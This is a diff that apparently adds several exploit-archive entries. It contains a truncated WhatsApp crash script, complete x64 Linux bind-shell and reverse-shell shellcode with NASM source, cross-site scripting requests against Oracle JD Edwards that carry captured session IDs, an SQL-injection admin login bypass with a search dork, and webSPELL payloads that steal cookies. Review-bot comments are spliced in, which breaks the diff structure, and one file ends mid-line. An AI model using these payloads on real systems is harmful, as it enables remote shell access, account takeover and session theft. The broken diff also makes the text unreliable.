+# Daniel Godoy @0xhielasangre
+# Credits:
+# Gonza Cabrera
+#
+# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
+#
+# Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
+# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
+# engaging in an interactive conversation over WhatsApp protocol
+#
+
+import argparse, sys, os, csv
+from Yowsup.Common.utilities import Utilities
+from Yowsup.Common.debugger import Debugger
+from Yowsup.Common.constants import Constants
+from Examples.CmdClient import WhatsappCmdClient
+from Examples.EchoClient import WhatsappEchoClient
+from Examples.ListenerClient import WhatsappListenerClient
+from Yowsup.Registration.v1.coderequest import WACodeRequest
+from Yowsup.Registration.v1.regrequest import WARegRequest
+from Yowsup.Registration.v1.existsrequest import WAExistsRequest
+from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
+from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
+from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
+from Yowsup.Contacts.contacts import WAContactsSyncRequest
+
+import threading,time, base64
+
+DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
+COUNTRIES_CSV = "countries.csv"
+
+DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
+
+
+######## Yowsup Configuration file #####################
+# Your configuration should contain info about your login credentials to Whatsapp. 
This typically consist of 3 fields:\n
+# phone: Your full phone number including country code, without '+' or '00'
+# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
+# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
+# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
+# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
+# or want to register, you can leave this field blank or set it to some random text.
+# password: Password to use for login. You obtain this password when you register using Yowsup.
+######################################################
+MINE_CONFIG ="config"
+
+def getCredentials(config = DEFAULT_CONFIG):
+ if os.path.isfile(config):
+ f = open(config)
+
+ phone = ""
+ idx = ""
+ pw = ""
+ cc = ""
+
+ try:
+ for l in f:
+ line = l.strip()
+ if len(line) and line[0] not in ('#',';'):
+
+ prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
+
+ varname = prep[0].strip()
+ val = prep[1].strip()
+
+ if varname == "phone":
+ phone = val
+ elif varname == "id":
+ idx = val
+ elif varname =="password":
+ pw =val
+ elif varname == "cc":
+ cc = val
+
+ return (cc, phone, idx, pw);
+ except:
+ pass
+
+ return 0
+
+def main(phone):
+ credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
+
+ if credentials:
+
+ countryCode, login, identity, password = credentials
+ identity = Utilities.processIdentity(identity)
+
+ password = base64.b64decode(password)
+
+ # Custom message that will crash WhatsApp
+ message = message = "#RemoteExecution?
\ No newline at end of file
diff --git a/platforms/lin_x86-64/shellcode/35586.c b/platforms/lin_x86-64/shellcode/35586.c
new file mode 100755
index 000000000..c26c51c00
--- /dev/null
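Review bot: `getCredentials` hides every failure behind a bare `except: pass` and never closes the file it opens, so a config line without `=` (where `prep[1]` raises IndexError) ends in `return 0` with no hint of which line was malformed. Open the file with `with open(config) as f:` and catch only the expected errors, for example `except (IOError, IndexError):`, reporting the offending line. In `main`, `MINE_CONFIG or DEFAULT_CONFIG` always selects the relative path `"config"` because `MINE_CONFIG` is a non-empty string, so the account password is read from whatever directory the script is started in rather than from `~/.yowsup/auth`. `DEFAULT_CONFIG` is also assigned twice and `message = message = …` repeats the assignment. Indentation is lost on this page, so where `return (cc, phone, idx, pw)` sits relative to the loop cannot be confirmed from the hunk.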
+++ b/platforms/lin_x86-64/shellcode/35586.c 
@@ -0,0 +1,248 @@ +/* +* Author: Sean Dillon +* Copyright: (c) 2014 CAaNES, LLC. (http://caanes.com) +* Release Date: December 19, 2014 +* +* Description: x64 Linux null-free TCP bind port shellcode, optional 4 byte password +* Assembled Size: 81 bytes, 96 with password +* Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64 +* License: http://opensource.org/license/MIT +* +* Build/Run: gcc -m64 -z execstack -fno-stack-protector bindshell.c -o bindshell.out +* ./bindshell.out & +* nc localhost 4444 +*/ + +/* +* NOTE: This C code binds on port 4444 and does not have the password option enabled. +* The end of this file contains the .nasm source code and instructions for building from that. +*/ + +#include +#include + +unsigned char shellcode[] = + "\x31\xf6" /* xor %esi,%esi */ + "\xf7\xe6" /* mul %esi */ + "\xff\xc6" /* inc %esi */ + "\x6a\x02" /* pushq $0x2 */ + "\x5f" /* pop %rdi */ + "\x04\x29" /* add $0x29,%al */ + "\x0f\x05" /* syscall */ + "\x50" /* push %rax */ + "\x5f" /* pop %rdi */ + "\x52" /* push %rdx */ + "\x52" /* push %rdx */ + "\xc6\x04\x24\x02" /* movb $0x2,(%rsp) */ + "\x66\xc7\x44\x24\x02\x11\x5c" /* movw $0x5c11,0x2(%rsp) */ + "\x54" /* push %rsp */ + "\x5e" /* pop %rsi */ + "\x52" /* push %rdx */ + "\x6a\x10" /* pushq $0x10 */ + "\x5a" /* pop %rdx */ + "\x6a\x31" /* pushq $0x31 */ + "\x58" /* pop %rax */ + "\x0f\x05" /* syscall */ + "\x5e" /* pop %rsi */ + "\xb0\x32" /* mov $0x32,%al */ + "\x0f\x05" /* syscall */ + "\xb0\x2b" /* mov $0x2b,%al */ + "\x0f\x05" /* syscall */ + "\x50" /* push %rax */ + "\x5f" /* pop %rdi */ + "\x6a\x03" /* pushq $0x3 */ + "\x5e" /* pop %rsi */ + "\xff\xce" /* dec %esi */ + "\xb0\x21" /* mov $0x21,%al */ + "\x0f\x05" /* syscall */ + "\x75\xf8" /* jne 35 */ + "\x56" /* push %rsi */ + "\x5a" /* pop %rdx */ + "\x56" /* push %rsi */ + "\x48\xbf\x2f\x2f\x62\x69\x6e" /* movabs $0x68732f6e69622f2f,%rdi */ + "\x2f\x73\x68" /* . 
*/ + "\x57" /* push %rdi */ + "\x54" /* push %rsp */ + "\x5f" /* pop %rdi */ + "\xb0\x3b" /* mov $0x3b,%al */ + "\x0f\x05" /* syscall */; + +main(void) +{ + printf("Shellcode length: %d\n", (int)strlen(shellcode)); + + /* pollute registers and call shellcode */ + __asm__ ( "mov $0xffffffffffffffff, %rax\n\t" + "mov %rax, %rbx\n\t" + "mov %rax, %rcx\n\t" + "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" + "mov %rax, %rdi\n\t" + "mov %rax, %rbp\n\t" + + "call shellcode" ); +} + +/* -------------------------------------------------------------------------------------- + +; Author: Sean Dillon +; Company: CAaNES, LLC. (http://caanes.com) +; Release Date: December 19, 2014 +; +; Description: x64 Linux null-free bind TCP port shellcode, optional 4 byte password +; Assembled Size: 81 bytes, 96 with password +; Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64 +; License: http://opensource.org/license/MIT +; +; Build/Run: nasm -f elf64 -o bindshell.o bindshell.nasm +; ld -o bindshell bindshell.o +; objdump -d --disassembler-options=addr64 bindshell + +BITS 64 +global _start +section .text + +; settings +%define USEPASSWORD ; comment this to not require password +PASSWORD equ 'Z~r0' ; cmp dword (SEGFAULT on fail; no bruteforce/cracking/etc.) 
+PORT equ 0x5c11 ; default 4444 + +; syscall kernel opcodes +SYS_SOCKET equ 0x29 +SYS_BIND equ 0x31 +SYS_LISTEN equ 0x32 +SYS_ACCEPT equ 0x2b +SYS_DUP2 equ 0x21 +SYS_EXECVE equ 0x3b + +; argument constants +AF_INET equ 0x2 +SOCK_STREAM equ 0x1 + +_start: +; High level psuedo-C overview of shellcode logic: +; +; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP) +; struct sockaddr = {AF_INET; [PORT; 0x0; 0x0]} +; +; bind(sockfd, &sockaddr, 16) +; listen(sockfd, 0) +; client = accept(sockfd, &sockaddr, 16) +; +; read(client, *pwbuf, 16) // 16 > 4 +; if (pwbuf != PASSWORD) goto drop +; +; dup2(client, STDIN+STDOUT+STDERR) +; execve("/bin/sh", NULL, NULL) + +create_sock: + ; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP) + + xor esi, esi ; 0 out rsi + mul esi ; 0 out rax, rdx + + ; rdx = IPPROTO_IP (int: 0) + + inc esi ; rsi = SOCK_STREAM (int: 1) + + push AF_INET ; rdi = AF_INET (int: 2) + pop rdi + + add al, SYS_SOCKET + syscall + + ; store sock + push rax + pop rdi ; rdi = sockfd + +struct_sockaddr: + ; struct sockaddr = {AF_INET; PORT; 0x0; 0x0} + + push rdx ; 0 out the stack for struct + push rdx + + mov byte [rsp], AF_INET ; sockaddr.sa_family = AF_INET (u_char) + mov word [rsp + 0x2], PORT ; sockaddr.sa_data[] = PORT (short) + push rsp + pop rsi ; rsi = &sockaddr + +bind_port: + ; bind(sockfd, const struct sockaddr *addr, 16) + + push rdx ; save 0 for rsi in SYS_LISTEN + + push 0x10 ; rdx = 16 (sizeof sockaddr) + pop rdx + + push SYS_BIND + pop rax + syscall + +server_listen: + ; listen(sockfd, 0) + + pop rsi ; backlog = 0 (int) + mov al, SYS_LISTEN + syscall + +client_accept: + ; client = accept(sockfd, struct sockaddr *addr, 16) + + mov al, SYS_ACCEPT + syscall + + ; store client + push rax + pop rdi ; rdi = client + + ; no need to close parent, save bytes + +%ifdef USEPASSWORD +password_check: + ; password = read(client, *buf, 4) + + push rsp + pop rsi ; rsi = &buf (char*) + + ; rdx = 0x10, >4 bytes + xor eax, eax ; SYS_READ = 0x0 + syscall + + cmp dword 
[rsp], PASSWORD ; simple comparison + jne drop ; bad pw, abort +%endif + +dupe_sockets: + ; dup2(client, STDIN) + ; dup2(client, STDOUT) + ; dup2(client, STERR) + + push 0x3 ; loop down file descriptors for I/O + pop rsi + +dupe_loop: + dec esi + mov al, SYS_DUP2 + syscall + + jne dupe_loop + +exec_shell: + ; execve('//bin/sh', NULL, NULL) + + push rsi ; *argv[] = 0 + pop rdx ; *envp[] = 0 + + push rsi ; '\0' + mov rdi, '//bin/sh' ; str + push rdi + push rsp + pop rdi ; rdi = &str (char*) + + mov al, SYS_EXECVE ; we fork with this syscall + syscall + +drop: + ; password check failed, crash program with BADINSTR/SEGFAULT + +;--------------------------------------------------------------------------------------*/ diff --git a/platforms/lin_x86-64/shellcode/35587.c b/platforms/lin_x86-64/shellcode/35587.c new file mode 100755 index 000000000..54f67c232 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/35587.c 
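Review bot: The header NOTE in 35586.c says only that the program "binds on port 4444", and the run line uses `nc localhost 4444`, but `struct_sockaddr` leaves the address bytes of the sockaddr zero, so the listener accepts on every interface, and the C byte array does so without the password check. I would state that in the NOTE, e.g. `* NOTE: listens on 0.0.0.0:4444 (all interfaces); password option disabled.`, so anyone running the harness or writing a detection for it knows the exposure. The comment `; we fork with this syscall` on `mov al, SYS_EXECVE` is also inaccurate, because execve replaces the calling process image and creates no child; `; execve replaces this process with /bin/sh` matches the code. The same comment appears in the nasm listing of 35587.c.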
@@ -0,0 +1,246 @@ +/* +* Author: Sean Dillon +* Copyright: (c) 2014 CAaNES, LLC. (http://caanes.com) +* Release Date: December 19, 2014 +* +* Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password +* Assembled Size: 77 - 85 bytes, 90 - 98 with password +* Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64 +* License: http://opensource.org/license/MIT +* +* Build/Run: gcc -m64 -z execstack -fno-stack-protector reverseshell.c -o reverseshell.out +* nc -l -p 4444 +*/ + +/* +* NOTE: This C code connects to 127.0.0.1:4444 and does not have the password option enabled. +* Because the IP 127.0.0.1 contains null-bytes, a mask has to be used, adding 8 bytes. +* The end of this file contains the .nasm source code and instructions for building from that. +*/ + +#include +#include + +char shellcode[] = + "\x31\xf6" /* xor %esi,%esi */ + "\xf7\xe6" /* mul %esi */ + "\xff\xc6" /* inc %esi */ + "\x6a\x02" /* pushq $0x2 */ + "\x5f" /* pop %rdi */ + "\x04\x29" /* add $0x29,%al */ + "\x0f\x05" /* syscall */ + "\x50" /* push %rax */ + "\x5f" /* pop %rdi */ + "\x52" /* push %rdx */ + "\x52" /* push %rdx */ + "\xc7\x44\x24\x04\x7d\xff\xfe" /* movl $0xfefeff7d,0x4(%rsp) */ + "\xfe" /* . */ + "\x81\x44\x24\x04\x02\x01\x01" /* addl $0x2010102,0x4(%rsp) */ + "\x02" /* . */ + "\x66\xc7\x44\x24\x02\x11\x5c" /* movw $0x5c11,0x2(%rsp) */ + "\xc6\x04\x24\x02" /* movb $0x2,(%rsp) */ + "\x54" /* push %rsp */ + "\x5e" /* pop %rsi */ + "\x6a\x10" /* pushq $0x10 */ + "\x5a" /* pop %rdx */ + "\x6a\x2a" /* pushq $0x2a */ + "\x58" /* pop %rax */ + "\x0f\x05" /* syscall */ + "\x6a\x03" /* pushq $0x3 */ + "\x5e" /* pop %rsi */ + "\xff\xce" /* dec %esi */ + "\xb0\x21" /* mov $0x21,%al */ + "\x0f\x05" /* syscall */ + "\x75\xf8" /* jne 39 */ + "\x56" /* push %rsi */ + "\x5a" /* pop %rdx */ + "\x56" /* push %rsi */ + "\x48\xbf\x2f\x2f\x62\x69\x6e" /* movabs $0x68732f6e69622f2f,%rdi */ + "\x2f\x73\x68" /* . 
*/ + "\x57" /* push %rdi */ + "\x54" /* push %rsp */ + "\x5f" /* pop %rdi */ + "\xb0\x3b" /* mov $0x3b,%al */ + "\x0f\x05" /* syscall */; + + +main(void) +{ + printf("Shellcode length: %d\n", (int)strlen(shellcode)); + + /* pollute registers and call shellcode */ + __asm__ ( "mov $0xffffffffffffffff, %rax\n\t" + "mov %rax, %rbx\n\t" + "mov %rax, %rcx\n\t" + "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" + "mov %rax, %rdi\n\t" + "mov %rax, %rbp\n\t" + + "call shellcode" ); +} + + +/* -------------------------------------------------------------------------------------- + +; Author: Sean Dillon +; Company: CAaNES, LLC. (http://caanes.com) +; Release Date: December 19, 2014 +; +; Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password +; Assembled Size: 77 - 85 bytes, 90 - 98 with password +; Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64 +; License: http://opensource.org/license/MIT +; +; Build/Run: nasm -f elf64 -o reverseshell.o reverseshell.nasm +; ld -o reverseshell reverseshell.o +; objdump -d --disassembler-options=addr64 reverseshell + +BITS 64 +global _start +section .text + +; settings +%define USEPASSWORD ; comment this to not require password +PASSWORD equ 'Z~r0' ; cmp dword (SEGFAULT on fail; no bruteforce/cracking/etc.) +IP equ 0x0100007f ; default 127.0.0.1, contains nulls so will need mask +PORT equ 0x5c11 ; default 4444 + +; change the null-free mask as needed +%define NULLFREE_MASK 0x02010102 ; comment this out if no .0. 
in IP, save 8 bytes + +%ifdef NULLFREE_MASK +%define NULLFREE_IP IP - NULLFREE_MASK +%else +%define NULLFREE_IP IP +%endif + +; syscall kernel opcodes +SYS_SOCKET equ 0x29 +SYS_CONNECT equ 0x2a +SYS_DUP2 equ 0x21 +SYS_EXECVE equ 0x3b + +; argument constants +AF_INET equ 0x2 +SOCK_STREAM equ 0x1 + +_start: +; High level psuedo-C overview of shellcode logic: +; +; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP) +; IP = NULLFREE_IP + NULLFREE_MASK +; struct sockaddr = {AF_INET; [PORT; IP; 0x0]} +; +; connect(sockfd, &sockaddr, 16) +; +; read(sockfd, *pwbuf, 16) // 16 > 4 +; if (pwbuf != PASSWORD) goto drop +; +; dup2(sockfd, STDIN+STDOUT+STDERR) +; execve("/bin/sh", NULL, NULL) + +create_sock: + ; sockfd = socket(AF_INET, SOCK_STREAM, 0) + ; AF_INET = 2 + ; SOCK_STREAM = 1 + ; syscall number 41 + + xor esi, esi ; 0 out rsi + mul esi ; 0 out rax, rdx + + ; rdx = IPPROTO_IP (int: 0) + + inc esi ; rsi = SOCK_STREAM (int: 1) + + push AF_INET ; rdi = AF_INET (int: 2) + pop rdi + + add al, SYS_SOCKET + syscall + + ; copy socket descriptor to rdi for future use + + push rax + pop rdi + +struct_sockaddr: + ; server.sin_family = AF_INET + ; server.sin_port = htons(PORT) + ; server.sin_addr.s_addr = inet_addr("127.0.0.1") + ; bzero(&server.sin_zero, 8) + + push rdx + push rdx + + mov dword [rsp + 0x4], NULLFREE_IP + +%ifdef NULLFREE_MASK + add dword [rsp + 0x4], NULLFREE_MASK +%endif + + mov word [rsp + 0x2], PORT + mov byte [rsp], AF_INET + +connect_sock: + ; connect(sockfd, (struct sockaddr *)&server, sockaddr_len) + + push rsp + pop rsi + + push 0x10 + pop rdx + + push SYS_CONNECT + pop rax + syscall + + +%ifdef USEPASSWORD +password_check: + ; password = read(sockfd, *buf, 4) + + ; rsi = &buf (char*) + ; rdx = 0x10, >4 bytes + + xor eax, eax ; SYS_READ = 0x0 + syscall + + cmp dword [rsp], PASSWORD ; simple comparison + jne drop ; bad pw, abort +%endif + +dupe_sockets: + ; dup2(sockfd, STDIN) + ; dup2(sockfd, STDOUT) + ; dup2(sockfd, STERR) + + push 0x3 ; loop down file 
descriptors for I/O + pop rsi + +dupe_loop: + dec esi + mov al, SYS_DUP2 + syscall + + jne dupe_loop + +exec_shell: + ; execve('//bin/sh', NULL, NULL) + + push rsi ; *argv[] = 0 + pop rdx ; *envp[] = 0 + + push rsi ; '\0' + mov rdi, '//bin/sh' ; str + push rdi + push rsp + pop rdi ; rdi = &str (char*) + + mov al, SYS_EXECVE ; we fork with this syscall + syscall + +drop: + ; password check failed, crash program with BADINSTR/SEGFAULT + +;--------------------------------------------------------------------------------------*/ diff --git a/platforms/multiple/remote/35638.txt b/platforms/multiple/remote/35638.txt new file mode 100755 index 000000000..ca624ddb9 --- /dev/null +++ b/platforms/multiple/remote/35638.txt @@ -0,0 +1,28 @@ +source: http://www.securityfocus.com/bid/47479/info + +Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This vulnerability affects the following supported versions: +8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 + +http://XXX.XXX.XXX.XXX/jde/E1Menu.maf + +Parameter: jdeowpBackButtonProtect + + + +* The GET request has been set to: >'"> + +/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED&%3E%27%22%3E%3Cscript%3Ealert%2820639%29%3C%2Fscript%3E=123 HTTP/1.0 + +Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00002ZzkuqI4ibppzAAcyOOuBnh:14p7umbnp; e1MenuState=100003759| + +Accept: */* + +Accept-Language: en-US + +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) + +Host: XXX.XXX.XXX.XXX \ No newline at end of file diff --git a/platforms/multiple/remote/35639.txt b/platforms/multiple/remote/35639.txt new file mode 100755 index 000000000..c16d55d31 --- /dev/null 
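Review bot: `main(void)` in the 35587.c test harness is declared without a return type, which relies on implicit int and is not valid from C99 onward; `int main(void)` keeps the harness building without relaxing the language standard. The two `#include` lines show no header name in this rendering; `printf` and `strlen` need `<stdio.h>` and `<string.h>`, so the committed file should be checked for them. The harness in 35586.c is written the same way, and there `strlen` is additionally passed an `unsigned char[]`, which needs a `(const char *)` cast to compile without a pointer-sign diagnostic.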
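Review bot: The captured request in 35638.txt keeps its `Cookie:` header with what looks like a real `JSESSIONID` value from the tested system, although the host is already masked as `XXX.XXX.XXX.XXX`. Session identifiers should be masked the same way, e.g. `JSESSIONID=<redacted>`, so the advisory does not publish a token that may still have been valid when it was written. 35639.txt through 35642.txt carry the same header with their own session values.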
+++ b/platforms/multiple/remote/35639.txt
@@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/47479/info
+
+Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This vulnerability affects the following supported versions:
+8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
+
+
+http://XXX.XXX.XXX.XXX/jde/E1Menu_Menu.mafService
+
+Parameter: e1.namespace
+
+
+
+* The POST request has been set to: %2Balert%2835890%29%2B
+
+ /jde/E1Menu_Menu.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_Menu&e1.namespace=%2Balert%2835890%29%2B HTTP/1.0
+
+Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000b7KChC3OjQct7TOz9U6NMhK:14p7umbnp; e1MenuState=100003759|
+
+Content-Length: 12
+
+Accept: */*
+
+Accept-Language: en-US
+
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+
+Host: XXX.XXX.XXX.XXX
+
+Content-Type: application/x-www-form-urlencoded
+
+Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
+
+
+
+nodeId=&a=lc
\ No newline at end of file
diff --git a/platforms/multiple/remote/35640.txt b/platforms/multiple/remote/35640.txt
new file mode 100755
index 000000000..73ce5b1c1
--- /dev/null
+++ b/platforms/multiple/remote/35640.txt
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/47479/info
+
+Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This vulnerability affects the following supported versions:
+8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
+
+http://XXX.XXX.XXX.XXX/jde/E1Menu_OCL.mafService
+
+Parameter: e1.namespace
+
+
+
+* The GET request has been set to: %2Balert%2848981%29%2B
+
+
+
+/jde/E1Menu_OCL.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_OCL&e1.namespace=%2Balert%2848981%29%2B×tamp=1290796450377
+HTTP/1.0
+
+Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000xXDQLJurffGMVi6Du_UnL0Z:14p7umbnp; e1MenuState=100003759|
+
+Accept: */*
+
+Accept-Language: en-US
+
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+
+Host: XXX.XXX.XXX.XXX
+
+Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
\ No newline at end of file
diff --git a/platforms/multiple/remote/35641.txt b/platforms/multiple/remote/35641.txt
new file mode 100755
index 000000000..328afd615
--- /dev/null
+++ b/platforms/multiple/remote/35641.txt
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/47479/info
+
+Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This vulnerability affects the following supported versions:
+8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
+
+http://XXX.XXX.XXX.XXX/jde/MafletClose.mafService
+
+Parameter: RENDER_MAFLET
+
+
+
+* The GET request has been set to: E1Menu"%2Balert%2844218%29%2B"
+
+
+
+/jde/MafletClose.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu"%2Balert%2844218%29%2B"&e1.service=MafletClose&e1.namespace= HTTP/1.0
+
+Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000FGUGWkc2Y9q-dO3GqshuPVQ:14p7umbnp; e1MenuState=100003759|
+
+Accept: */*
+
+Accept-Language: en-US
+
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+
+Host: XXX.XXX.XXX.XXX
+
+Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
\ No newline at end of file
diff --git a/platforms/multiple/remote/35642.txt b/platforms/multiple/remote/35642.txt
new file mode 100755
index 000000000..a983246e4
--- /dev/null
+++ b/platforms/multiple/remote/35642.txt
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/47479/info
+
+Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This vulnerability affects the following supported versions:
+8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3
+
+* http://XXX.XXX.XXX.XXX/jde/JASMafletMafBrowserClose.mafService
+
+Parameter: jdemafjasLinkTarget
+
+
+
+* The GET request has been set to: E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B"
+
+
+
+/jde/JASMafletMafBrowserClose.mafService?jdemafjasFrom=BrowserClose&e1.mode=view&jdeLoginAction=LOGOUT&e1.state=maximized&jdemafjasLinkTarget=E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B"&RENDER_MAFLET=E1Menu&jdemafjasLauncher=PSFT_TE_V3_SW&e1.service=JASMafletMafBrowserClose&e1.namespace=
+HTTP/1.0
+
+Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00003wyVho0_-Ma0fQp67cuqdCs:14p7ulc8o; e1MenuState=100003759|
+
+Accept: */*
+
+Accept-Language: en-US
+
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+
+Host: XXX.XXX.XXX.XXX
+
+Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED
\ No newline at end of file
diff --git a/platforms/php/webapps/35492.txt b/platforms/php/webapps/35492.txt
new file mode 100755
index 000000000..f2df43f27
--- /dev/null
+++ b/platforms/php/webapps/35492.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Free Article Submissions SQL Injection Vulnerability
+# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
+ inurl:/category.php?id=2 "Arts & Entertainment"
+# Date: 07/12/2014
+# Exploit Author: BarrabravaZ
+# Vendor Homepage: http://www.articlesetup.com/
+# Software Link: [download link if available]
+# Version: 1.00
+# Tested on: Windows
+
+
+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+ «««:»»» Author will be not responsible for any damage. «««:»»»
+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+x
+x Issue:
+x SQL Injection Bypass Login
+x
+x Risk level: High
+x ~ The remote attacker has the possibility to manage the website.
+x ~ The remote attacker is able to login into website with access level as admin.
+x
+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+
+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+##
+## Proof Of Concept:
+## http://127.0.0.1/admin/login.php
+##
+## Username : ' OR 1=1 #
+## Password : barrabravaz
+##
+##
+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+
+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+Special thanks to:
+[+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
+[+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
\ No newline at end of file
diff --git a/platforms/php/webapps/35643.txt b/platforms/php/webapps/35643.txt
new file mode 100755
index 000000000..babf7c603
--- /dev/null
+++ b/platforms/php/webapps/35643.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/47500/info
+
+webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+webSPELL 4.2.2a is affected; other versions may also be vulnerable.
+
+
+http://www.example.com/index.php?site=newsletter&pass=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
+http://www.example.com/index.php?site=messenger&action=touser&touser=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
+http://www.example.com/admin/admincenter.php?site=users&action=addtoclan&id=1&page=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
+http://www.example.com/admin/admincenter.php?site=squads&action=edit&squadID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
+http://www.example.com/admin/admincenter.php?site=contact&action=edit&contactID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E
\ No newline at end of file